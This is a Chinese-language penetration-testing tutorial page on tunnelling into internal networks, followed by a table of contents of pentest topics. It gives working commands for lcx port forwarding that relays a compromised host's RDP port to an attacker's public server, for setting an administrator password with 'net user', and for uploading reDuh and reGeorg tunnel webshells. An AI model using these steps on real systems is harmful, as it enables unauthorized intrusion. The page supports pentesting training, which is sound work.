# 內網穿透方式
滲透測試過程中,經常會遇到以下場景:通過web腳本漏洞獲得了某web主機的system權限,甲方有進一步的內網滲透測試需求,以證明企業所面臨的巨大風險,這個時候就需要做內網的域滲透。
## 零、NAT網絡地址轉換?
網絡地址轉換(Network Address Translation,NAT)機制的問題在于,NAT設備自動屏蔽了非內網主機主動發起的連接,也就是說,從外網發往內網的數據包將被NAT設備丟棄,這使得位于不同NAT設備之后的主機之間無法直接交換信息。
一方面保護了內網主機免于來自外部網絡的攻擊,另一方面也為P2P通信帶來了一定困難。
外部主機要與內網主機相互通信,必須由內網主機主動發起連接,使 NAT設備產生一個映射條目,這就有必要研究一下內網穿透技術。
## 1??在同一局域網下的遠程控制
***
如果開啟了3389遠程登陸,那么直接遠程就好了
①右擊我的電腦,選擇屬性后點擊遠程控制,點擊允許遠程控制此計算機,按win+R,輸入cmd進入dos,輸入ipconfig查看本機IP,由于遠程控制要求被控制電腦的賬戶有密碼,所以如果沒有設置賬戶密碼的話還要再dos下輸入net user Administrator XXX,XXX是你的密碼
>②在另一臺電腦上按win+R,輸入mstsc,再在彈出的頁面輸入被控制電腦的ip,然后再輸入用戶名Administrator和你剛才設置的密碼。

**??連接成功,測試一下發現幾乎沒有延遲,仿佛用的就是被控制的電腦,希望外網控制時也能這樣快。**
## 2??通信雙方一臺位于NAT 之后
攻擊者這邊,要有一個有 公網IP的服務器,以便接收反向連接
### 第一:Webshell如何開啟3389服務
**①、通過修改注冊表開啟遠程終端**
**詳情參考:** ??開啟3389常用終端命令篇章
**②、通過webshell上傳3389工具開啟遠程終端**
### 第二:如果服務器端口被修改如何查找?
目前主要通過注冊表讀取、端口掃描、命令探針等三種方法查找修改后的端口。
### 第三:如何遠程連接內網電腦?
#### 1、通過lcx端口轉發
**概念:**
1. 首先內網中的主機一般都是使用的私有ip,在網絡出口處經過NAT轉換為公網ip后,才能訪問internet。
2. 所以,有時當我們進入網站后臺cmd,或者捕獲了一臺內網中的肉雞,是無法主動去鏈接這臺肉雞的,也不好在別人的路由器上做端口映射,這就體現lcx的作用了。
3. lcx實現端口轉發,將肉雞A上的某個端口(常用的3389),轉發到具有公網地址的主機B上,這樣我們只需要連接主機B的3389端口就相當于連接到了肉雞A上,從而突破了內網私有ip的限制。
**步驟:**
1. 獲取webshell后:
上傳一個cmd.exe文件和lck.exe,然后setp cmd.exe設置終端路徑解決運行權限問題。
2. Webshell上執行:
```cmd
#將本機(肉雞)3389端口流量轉發到公網ip的2222端口上去
lcx.exe -slave 自己的公網ip 2222 127.0.0.1 3389
```
3. 自己的服務器里面執行:
```cmd
# 監聽本地的2222端口將流量轉發到4444
lcx.exe -listen 2222 4444
```
4. 最后通過3389連接172.0.0.1:4444即可
#### 2、通過reDuh端口轉發腳本
**概念**
ReDuh 是一個通過 HTTP 協議建立隧道傳輸各種其他數據的工具。其可以把內網服務器的端口通過 http/https 隧道轉發到本機,形成一個連通回路。用于目標服務器在內網或做了端口策略的情況下連接目標服務器內部開放端口。
**步驟:**
1. 將reDuh.php上傳到目標服務器
2. 在物理機成功訪問reDuh.php
xxxx.com/reDuh.php
3. 打開客戶端reDuhGUI.exe,進行連接,然后就可以用3389進行連接了
## 3??通信雙方均位于NAT設備之后
使用reGeorg+Proxifier
***
**概念**
有時候你路由器的ip并不是公網ip,也就是說你的路由器也是另一層局域網下的設備,這種情況下只對你的路由器進行端口映射然并卵,因為你始終拿不到最頂層路由ip。
**步驟:**
1. 將tunnel.nosocket.php上傳至目標主機
2. 通過網頁能正常訪問tunnel.nosocket.php后
再打開reGeorgSocksProxy.py腳本文件進行配置
```python
\reGeorgSocksProxy.py -p? 9999 -u?http://192.168.0.102:8080/tunnel.nosocket.php
```
3. 安裝Proxifier,并設置代理規則。除reGeorgSocksProxy.py外,其余都設置為通過代理

4. 完成上述步驟后,即可訪問目標的內部網絡

## 補充:關于burp+Proxifier結合抓包
如微信等有很多APP現在是防代理的或者黑名單防御,但是抓包中間加一個環節使用這個Proxifier軟件作為中間代理,就可以應對了,因為socks是很正規的
**方法**
1. 在電腦上裝模擬器
2. 把burp ca證書丟在模擬器里加載
3. 設置規則 新建規則
讓模擬器這個進程所有數據包走socks就可以了
注意:結合使用的工具不要進行攔截,要選擇direct模式
4. 訪問驗證
- src導航站
- kali和msf
- 信息收集
- 收集域名信息
- Whois 查詢
- 備案信息查詢
- 信用信息查詢
- IP反查站點的站
- 瀏覽器插件
- 收集子域名信息
- 在線平臺
- 工具枚舉
- ssl與證書透明度
- DNS歷史解析
- DNS域傳送漏洞
- C段探測
- JS文件域名&ip探測
- 搜索引擎&情報社區
- google黑客
- 威脅情報
- 鐘馗之眼
- 收集相關應用信息
- 微信公眾號&微博
- APP收集&反編譯
- 收集常用端口信息
- 常見端口&解析&總結
- 掃描工具
- 網絡空間引擎搜索
- 瀏覽器插件
- nmap掃描
- 收集敏感信息
- 源碼泄露
- 郵箱信息收集
- 備份文件泄露
- 目錄&后臺掃描
- 公網網盤
- 歷史資產
- 指紋&WAF&CDN識別
- 指紋識別
- CDN識別
- 繞過CDN查找真實IP
- WAF識別
- 漏洞資源和社工
- 漏洞公共資源庫
- 社會工程
- 資產梳理
- 各種對滲透有幫助的平臺
- 掃描器
- 掃描器對比
- AppScan(IBM)_web和系統
- AWVS_web掃描
- X-Scan_系統掃描
- WebInspect_HP_WEB
- Netsparker_web
- WVSS_綠盟_web
- 安恒明鑒
- Nessus_系統
- nexpose_系統
- 啟明天鏡_web_系統
- SQL注入
- 常用函數
- sql注入步驟
- union注入和information_schema庫
- 函數和報錯注入
- SQL盲注
- 其他注入方式
- 防止SQL注入解決方案
- Access數據庫注入
- MSSQL數據庫注入
- MYSQL數據庫注入
- 神器SQLmap
- xss跨站腳本攻擊
- xss原理和分類
- xss案例和修復
- xss繞過技巧
- xss案例
- 文件上傳下載包含
- 常有用文件路徑
- 文件上傳漏洞
- 文件下載漏洞
- 文件包含漏洞
- upload-labs上傳漏洞練習
- XXE、SSRF、CSRF
- SSRF原理基礎
- SSRF案例實戰
- CSRF原理基礎
- CSRF案例及防范
- XXE之XML_DTD基礎
- XXE之payload與修復
- XXE結合SSRF
- 遠程命令執行與反序列化
- 遠程命令和代碼執行漏洞
- 反序列化漏洞
- 驗證碼與暴力破解
- 爆破與驗證碼原理
- CS架構暴力破解
- BS架構暴力破解
- WEB編輯器漏洞
- 編輯器漏洞基礎
- Ewebeditor編輯器
- FCKeditor編輯器
- 其他編輯器
- web中間件漏洞
- 中間件解析漏洞
- Tomcat常見的漏洞總結
- Jboss漏洞利用總結
- Weblogic漏洞利用總結
- WEB具體步驟
- 旁注和越權
- CDN繞過
- 越權與邏輯漏洞
- WEB應用常見其他漏洞
- WEB登陸頁面滲透思路
- 獲取WEBshell思路
- 社工、釣魚、apt
- 社工和信息收集
- 域名欺騙
- 釣魚郵件
- 一些釣魚用的掛馬工具
- 代碼審計
- 代碼審計工具
- WAF繞過
- WAF基礎及云WAF
- 各種WAF繞過方法
- 繞過WAF上傳文件
- 系統提權
- windows系統提權
- linux系統提權
- 數據庫提權操作系統
- 內網橫向滲透
- 內網穿透方式
- 一些內網第三方應用提權
- ARP與DOS
- ARP欺騙
- DOS與DDOS
- 一些DOS工具